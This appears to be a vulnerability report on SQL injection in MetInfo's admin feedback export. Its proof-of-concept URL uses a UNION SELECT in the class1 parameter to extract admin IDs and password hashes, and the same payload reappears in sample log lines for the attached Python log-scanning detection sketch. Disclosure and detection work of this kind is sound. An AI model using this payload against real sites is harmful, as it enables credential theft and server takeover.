Open
Description
Attackers can get arbitrary data from the database, and can even use SQL to write a webshell.
POC:
1. First, download the latest version of MetInfo from https://www.metinfo.cn/download/
2. Then install it and log in as admin.
3. Finally, request http://localhost/admin/index.php?n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(admin_id,0x7e,admin_pass)//from/**/met_admin_table
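A detection sketch for the request described in this report, added here as an example and not part of the original issue or MetInfo's code: it flags feedback-export requests in a web access log whose `class1` value is not a plain integer. The integer assumption, the log format and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption (not taken from MetInfo's code): class1 is a numeric column id,
# so a legitimate value is a plain integer.
INT_RE = re.compile(r"-?\d+")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format); the second one carries
# the request quoted in the report.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/index.php?n=feedback&c=feedback_admin&a=doexport&class1=12 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /admin/index.php?n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(admin_id,0x7e,admin_pass)//from/**/met_admin_table HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=3 HTTP/1.1" 200 128',
]

def is_feedback_export(params):
    """True when the query string selects the feedback export action."""
    return (params.get("n") == ["feedback"]
            and params.get("c") == ["feedback_admin"]
            and params.get("a") == ["doexport"])

def suspicious_class1(url):
    """Return the offending class1 value, or None if the request looks normal."""
    parts = urlsplit(url)
    if not parts.path.endswith("/admin/index.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if not is_feedback_export(params):
        return None
    for value in params.get("class1", []):
        if not INT_RE.fullmatch(value.strip()):
            return value
    return None

def scan(log_lines):
    """Return (client_ip, class1_value) for every flagged request line."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match:
            bad = suspicious_class1(match.group(1))
            if bad is not None:
                hits.append((line.split()[0], bad))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"non-integer class1 from {ip}: {value}")
```

The same integer check, applied server-side before `class1` reaches the query, is the corresponding input-validation control; the path suffix needs adjusting if the admin directory has been renamed.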

